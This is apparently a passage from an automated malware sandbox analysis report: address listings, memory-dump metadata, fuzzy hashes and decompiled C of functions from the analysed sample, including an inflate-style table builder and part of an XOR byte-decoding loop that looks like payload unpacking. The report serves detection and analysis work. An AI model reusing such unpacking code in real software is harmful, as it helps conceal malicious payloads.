                                                                                                0x00405fa9
                                                                                                0x00405fae
                                                                                                0x00405fb4
                                                                                                0x00405fba
                                                                                                0x00405fbc
                                                                                                0x00405fbf
                                                                                                0x00405fc8
                                                                                                0x00405fce
                                                                                                0x00405fce
                                                                                                0x00405fc1
                                                                                                0x00405fc3
                                                                                                0x00405fc5
                                                                                                0x00405fc5
                                                                                                0x00405fd0
                                                                                                0x00405fd6
                                                                                                0x00405fd9
                                                                                                0x00405fdb
                                                                                                0x00405fdd
                                                                                                0x00405fe3
                                                                                                0x00405fe5
                                                                                                0x00405fe7
                                                                                                0x00405fea
                                                                                                0x00405ff3
                                                                                                0x00405ff3
                                                                                                0x00405ff5
                                                                                                0x00405fec
                                                                                                0x00405fec
                                                                                                0x00405fef
                                                                                                0x00405fef
                                                                                                0x00405ff7
                                                                                                0x00405ff7
                                                                                                0x00405fe5
                                                                                                0x00405ffa
                                                                                                0x00405ffc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405ffc
                                                                                                0x00405f77
                                                                                                0x00405f77
                                                                                                0x00405f7d
                                                                                                0x00405f83
                                                                                                0x00405f85
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405f87
                                                                                                0x00405f87
                                                                                                0x00405f89
                                                                                                0x00405f8b
                                                                                                0x00405f8e
                                                                                                0x00405f95
                                                                                                0x00405f95
                                                                                                0x00405f97
                                                                                                0x00405f90
                                                                                                0x00405f90
                                                                                                0x00405f92
                                                                                                0x00405f92
                                                                                                0x00405f99
                                                                                                0x00405f9b
                                                                                                0x00405f9e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004060a2
                                                                                                0x004060a5
                                                                                                0x004060a8
                                                                                                0x004060ae
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406285
                                                                                                0x00406285
                                                                                                0x00406285
                                                                                                0x00406288
                                                                                                0x0040628b
                                                                                                0x0040628d
                                                                                                0x00406290
                                                                                                0x00406296
                                                                                                0x0040629d
                                                                                                0x0040629f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406173
                                                                                                0x00406173
                                                                                                0x0040619b
                                                                                                0x0040619b
                                                                                                0x0040619b
                                                                                                0x0040619d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040617b
                                                                                                0x0040617b
                                                                                                0x0040617f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406185
                                                                                                0x00406185
                                                                                                0x00406188
                                                                                                0x0040618b
                                                                                                0x0040618e
                                                                                                0x00406190
                                                                                                0x00406192
                                                                                                0x00406195
                                                                                                0x00406198
                                                                                                0x00406198
                                                                                                0x00406198
                                                                                                0x0040619f
                                                                                                0x0040619f
                                                                                                0x004061a7
                                                                                                0x004061aa
                                                                                                0x004061b0
                                                                                                0x004061b3
                                                                                                0x004061b7
                                                                                                0x004061bb
                                                                                                0x004061be
                                                                                                0x004061c1
                                                                                                0x004061d9
                                                                                                0x004061d9
                                                                                                0x004061dc
                                                                                                0x004061ea
                                                                                                0x004061ed
                                                                                                0x004061de
                                                                                                0x004061de
                                                                                                0x004061e0
                                                                                                0x004061e7
                                                                                                0x004061e7
                                                                                                0x00406216
                                                                                                0x00406216
                                                                                                0x00406216
                                                                                                0x00406219
                                                                                                0x0040621b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004061f6
                                                                                                0x004061f6
                                                                                                0x004061fa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406200
                                                                                                0x00406200
                                                                                                0x00406203
                                                                                                0x00406206
                                                                                                0x00406209
                                                                                                0x0040620b
                                                                                                0x0040620d
                                                                                                0x00406210
                                                                                                0x00406213
                                                                                                0x00406213
                                                                                                0x00406213
                                                                                                0x0040621d
                                                                                                0x0040621d
                                                                                                0x0040621f
                                                                                                0x00406221
                                                                                                0x0040622c
                                                                                                0x0040622f
                                                                                                0x00406232
                                                                                                0x00406234
                                                                                                0x00406236
                                                                                                0x00406238
                                                                                                0x0040623b
                                                                                                0x0040623e
                                                                                                0x00406243
                                                                                                0x00406246
                                                                                                0x00406249
                                                                                                0x0040624c
                                                                                                0x00406253
                                                                                                0x00406256
                                                                                                0x00406258
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040625e
                                                                                                0x0040625e
                                                                                                0x00406262
                                                                                                0x00406273
                                                                                                0x00406273
                                                                                                0x00406273
                                                                                                0x00406275
                                                                                                0x00406275
                                                                                                0x00406279
                                                                                                0x00406279
                                                                                                0x00406279
                                                                                                0x0040627b
                                                                                                0x0040627c
                                                                                                0x0040627f
                                                                                                0x0040627f
                                                                                                0x0040627f
                                                                                                0x00406282
                                                                                                0x00000000
                                                                                                0x00406282
                                                                                                0x00406264
                                                                                                0x00406264
                                                                                                0x00406267
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040626d
                                                                                                0x0040626d
                                                                                                0x00000000
                                                                                                0x0040626d
                                                                                                0x004061c3
                                                                                                0x004061c3
                                                                                                0x004061c5
                                                                                                0x004061c7
                                                                                                0x004061ca
                                                                                                0x004061cd
                                                                                                0x004061d1
                                                                                                0x004061d1
                                                                                                0x004062a5
                                                                                                0x004062a5
                                                                                                0x004062a8
                                                                                                0x004062af
                                                                                                0x004062b3
                                                                                                0x004062b5
                                                                                                0x004062b8
                                                                                                0x004062bb
                                                                                                0x004062c0
                                                                                                0x004062c3
                                                                                                0x004062c5
                                                                                                0x004062c6
                                                                                                0x004062c9
                                                                                                0x004062d4
                                                                                                0x004062d7
                                                                                                0x004062ee
                                                                                                0x004062f3
                                                                                                0x004062fa
                                                                                                0x004062ff
                                                                                                0x00406303
                                                                                                0x00406305
                                                                                                0x00406305
                                                                                                0x00406305
                                                                                                0x00406308
                                                                                                0x0040630a
                                                                                                0x00000000
                                                                                                0x00406310
                                                                                                0x00406310
                                                                                                0x00406314
                                                                                                0x0040631f
                                                                                                0x00406332
                                                                                                0x00406337
                                                                                                0x0040633c
                                                                                                0x0040633e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406344
                                                                                                0x00406344
                                                                                                0x00406347
                                                                                                0x00406349
                                                                                                0x00406357
                                                                                                0x00406357
                                                                                                0x0040635a
                                                                                                0x0040635a
                                                                                                0x0040635d
                                                                                                0x00406360
                                                                                                0x00406363
                                                                                                0x00406366
                                                                                                0x00406369
                                                                                                0x0040636c
                                                                                                0x00000000
                                                                                                0x0040636c
                                                                                                0x0040634b
                                                                                                0x0040634b
                                                                                                0x00406351
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406351
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004066f0
                                                                                                0x004066f0
                                                                                                0x004066f6
                                                                                                0x004066fc
                                                                                                0x00406701
                                                                                                0x00406707
                                                                                                0x0040670d
                                                                                                0x0040670f
                                                                                                0x00406712
                                                                                                0x0040671b
                                                                                                0x00406721
                                                                                                0x00406721
                                                                                                0x00406714
                                                                                                0x00406716
                                                                                                0x00406718
                                                                                                0x00406718
                                                                                                0x00406723
                                                                                                0x00406725
                                                                                                0x00406728
                                                                                                0x00406763
                                                                                                0x00406763
                                                                                                0x00000000
                                                                                                0x0040672a
                                                                                                0x0040672a
                                                                                                0x0040672a
                                                                                                0x00406730
                                                                                                0x00406733
                                                                                                0x00406735
                                                                                                0x0040676a
                                                                                                0x0040676c
                                                                                                0x00000000
                                                                                                0x0040676c
                                                                                                0x00000000
                                                                                                0x00406735
                                                                                                0x00000000
                                                                                                0x00405d74
                                                                                                0x00406742
                                                                                                0x00000000
                                                                                                0x00406742
                                                                                                0x00406156
                                                                                                0x00406158
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040615a
                                                                                                0x0040615a
                                                                                                0x0040615d
                                                                                                0x00000000
                                                                                                0x0040615d
                                                                                                0x004060a2
                                                                                                0x00406063
                                                                                                0x00406747
                                                                                                0x0040674a
                                                                                                0x0040674c
                                                                                                0x00406755
                                                                                                0x0040675b
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                                                                                • Instruction ID: e2ef9aa76577a7a1e17a70bef0141433c3d77918b2314780ae2ebb94a64f5d95
                                                                                                • Opcode Fuzzy Hash: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                                                                                • Instruction Fuzzy Hash: D1E17B71900709DFDB28CF58C884BAAB7F5EB44305F15852FE896AB291D378AA51CF14
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040681A, Relevance: .3, Instructions: 300COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0040681A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42cdf0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42cdf0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42cdf0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                                                0x00406825
                                                                                                0x0040682d
                                                                                                0x00406831
                                                                                                0x00406833
                                                                                                0x00406836
                                                                                                0x00406838
                                                                                                0x00406838
                                                                                                0x0040683a
                                                                                                0x00406841
                                                                                                0x00406843
                                                                                                0x00406843
                                                                                                0x00406849
                                                                                                0x0040685e
                                                                                                0x00406866
                                                                                                0x00406868
                                                                                                0x0040686a
                                                                                                0x0040686d
                                                                                                0x0040686e
                                                                                                0x0040686e
                                                                                                0x00406874
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406876
                                                                                                0x00406879
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406879
                                                                                                0x0040687d
                                                                                                0x00406880
                                                                                                0x00406882
                                                                                                0x00406882
                                                                                                0x00406885
                                                                                                0x0040688b
                                                                                                0x0040688c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040688c
                                                                                                0x00406891
                                                                                                0x00406894
                                                                                                0x00406896
                                                                                                0x00406896
                                                                                                0x0040689c
                                                                                                0x0040689e
                                                                                                0x004068af
                                                                                                0x004068a2
                                                                                                0x004068a6
                                                                                                0x00406b4b
                                                                                                0x00000000
                                                                                                0x00406b4b
                                                                                                0x004068ac
                                                                                                0x004068ad
                                                                                                0x004068ad
                                                                                                0x004068b5
                                                                                                0x004068b8
                                                                                                0x004068bc
                                                                                                0x004068be
                                                                                                0x004068c0
                                                                                                0x004068c3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004068cb
                                                                                                0x004068d1
                                                                                                0x004068d3
                                                                                                0x004068d5
                                                                                                0x004068d6
                                                                                                0x004068eb
                                                                                                0x004068eb
                                                                                                0x004068ee
                                                                                                0x004068f0
                                                                                                0x004068f0
                                                                                                0x004068f2
                                                                                                0x004068f7
                                                                                                0x004068f9
                                                                                                0x00406900
                                                                                                0x00406902
                                                                                                0x0040690a
                                                                                                0x0040690a
                                                                                                0x0040690c
                                                                                                0x0040690d
                                                                                                0x0040691c
                                                                                                0x00406920
                                                                                                0x00406924
                                                                                                0x00406927
                                                                                                0x0040692a
                                                                                                0x0040692f
                                                                                                0x00406932
                                                                                                0x00406938
                                                                                                0x0040693f
                                                                                                0x00406945
                                                                                                0x00406b3e
                                                                                                0x00406b3e
                                                                                                0x00406b43
                                                                                                0x00406b52
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406b43
                                                                                                0x00406952
                                                                                                0x00406955
                                                                                                0x00406958
                                                                                                0x0040695b
                                                                                                0x0040695f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040696a
                                                                                                0x0040696d
                                                                                                0x0040696e
                                                                                                0x00406970
                                                                                                0x00406976
                                                                                                0x00406979
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040697f
                                                                                                0x00406980
                                                                                                0x00406983
                                                                                                0x00406986
                                                                                                0x00406989
                                                                                                0x0040698f
                                                                                                0x00406991
                                                                                                0x00406991
                                                                                                0x00406999
                                                                                                0x0040699d
                                                                                                0x004069a2
                                                                                                0x004069c7
                                                                                                0x004069cd
                                                                                                0x004069cf
                                                                                                0x004069d1
                                                                                                0x004069d4
                                                                                                0x004069dd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004069a4
                                                                                                0x004069a4
                                                                                                0x004069ad
                                                                                                0x004069b1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004069c2
                                                                                                0x004069c2
                                                                                                0x004069c5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004069b5
                                                                                                0x004069b8
                                                                                                0x004069ba
                                                                                                0x004069be
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004069c0
                                                                                                0x004069c0
                                                                                                0x00000000
                                                                                                0x004069c2
                                                                                                0x004069e6
                                                                                                0x004069ec
                                                                                                0x004069f6
                                                                                                0x004069f8
                                                                                                0x004069fd
                                                                                                0x004069ff
                                                                                                0x00406a35
                                                                                                0x00406a01
                                                                                                0x00406a01
                                                                                                0x00406a04
                                                                                                0x00406a07
                                                                                                0x00406a11
                                                                                                0x00406a14
                                                                                                0x00406a1b
                                                                                                0x00406a26
                                                                                                0x00406a2d
                                                                                                0x00406a2d
                                                                                                0x00406a37
                                                                                                0x00406a3a
                                                                                                0x00406a3c
                                                                                                0x00406a42
                                                                                                0x00406a42
                                                                                                0x00406a4b
                                                                                                0x00406a4e
                                                                                                0x00406a53
                                                                                                0x00406a62
                                                                                                0x00406a6a
                                                                                                0x00406a6f
                                                                                                0x00406a93
                                                                                                0x00406a9b
                                                                                                0x00406a9f
                                                                                                0x00406aa5
                                                                                                0x00406a71
                                                                                                0x00406a7f
                                                                                                0x00406a82
                                                                                                0x00406a88
                                                                                                0x00406a88
                                                                                                0x00406aa9
                                                                                                0x00406a64
                                                                                                0x00406a64
                                                                                                0x00406a64
                                                                                                0x00406aba
                                                                                                0x00406abe
                                                                                                0x00406aca
                                                                                                0x00406ac5
                                                                                                0x00406ac8
                                                                                                0x00406ac8
                                                                                                0x00406ad2
                                                                                                0x00406ad7
                                                                                                0x00406adf
                                                                                                0x00406adb
                                                                                                0x00406add
                                                                                                0x00406add
                                                                                                0x00406ae5
                                                                                                0x00406ae7
                                                                                                0x00406aee
                                                                                                0x00406af8
                                                                                                0x00406b02
                                                                                                0x00406b1e
                                                                                                0x00406b22
                                                                                                0x00406967
                                                                                                0x0040696d
                                                                                                0x0040696e
                                                                                                0x00406970
                                                                                                0x00406976
                                                                                                0x00406979
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406979
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406b04
                                                                                                0x00406b04
                                                                                                0x00406b04
                                                                                                0x00406b09
                                                                                                0x00406b12
                                                                                                0x00406b1b
                                                                                                0x00000000
                                                                                                0x00406b1b
                                                                                                0x00406b28
                                                                                                0x00406b28
                                                                                                0x00406b2b
                                                                                                0x00406b32
                                                                                                0x00406b35
                                                                                                0x00000000
                                                                                                0x00406958
                                                                                                0x004068d8
                                                                                                0x004068da
                                                                                                0x004068da
                                                                                                0x004068de
                                                                                                0x004068e1
                                                                                                0x004068e2
                                                                                                0x004068e2
                                                                                                0x00000000
                                                                                                0x004068da
                                                                                                0x0040684e
                                                                                                0x00406854
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                                                                                • Instruction ID: 233014ff28be9fca5e40c1aeee1244862099a57bf12043c09a7623bfee50ec27
                                                                                                • Opcode Fuzzy Hash: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                                                                                • Instruction Fuzzy Hash: D0C13B71A00259CBCF14DF68C4905EEB7B2FF99314F26826AD856B7380D734A952CF94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDC29E5, Relevance: .2, Instructions: 242COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 91167e1082a4ff31738f1b644aec9a937fd435667615145e0e26f166ea111db3
                                                                                                • Instruction ID: ff55febec8dc599a4defa8cb513f6cb061e4dcf1dbaa94737291e7882441f159
                                                                                                • Opcode Fuzzy Hash: 91167e1082a4ff31738f1b644aec9a937fd435667615145e0e26f166ea111db3
                                                                                                • Instruction Fuzzy Hash: 83C1031585D2EDADCF06CBF981517FCBFB05E2A112F0841C6E4E5A6283C13A938EDB21
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDC29F4, Relevance: .2, Instructions: 234COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 603c4acd0c85357d8b319ace5378ece20c212dfeb4bc3d885a5a5a309f44eaf7
                                                                                                • Instruction ID: 7ed666ec120cbadd83bd50cd5432a7e00930dfbaa6b72d9cea840a0eb8ac28f6
                                                                                                • Opcode Fuzzy Hash: 603c4acd0c85357d8b319ace5378ece20c212dfeb4bc3d885a5a5a309f44eaf7
                                                                                                • Instruction Fuzzy Hash: 7BB1E21595D2EDADCF06CBF981617FCBFB05D2A112F0845C6E4E5A6283C13A938EDB21
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAF5AF, Relevance: .1, Instructions: 147memoryCOMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E6EDAF5AF() {
				signed int _t40;
				signed int _t76;
				signed int _t77;
				char _t108;

				L0:
				while(1) {
					L0:
					_t40 =  *0x6edc72a0; // 0x12ec
					 *0x6edc72a0 = _t40 + 1;
					L1:
					if( *0x6edc72a0 < 0x12ec) {
						L2:
						_t77 =  *0x6edc72a0; // 0x12ec
						_t1 =  &E6EDC2000 + _t77; // 0x7265766f
						 *0x6edc7f28 =  *_t1;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x00000068;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
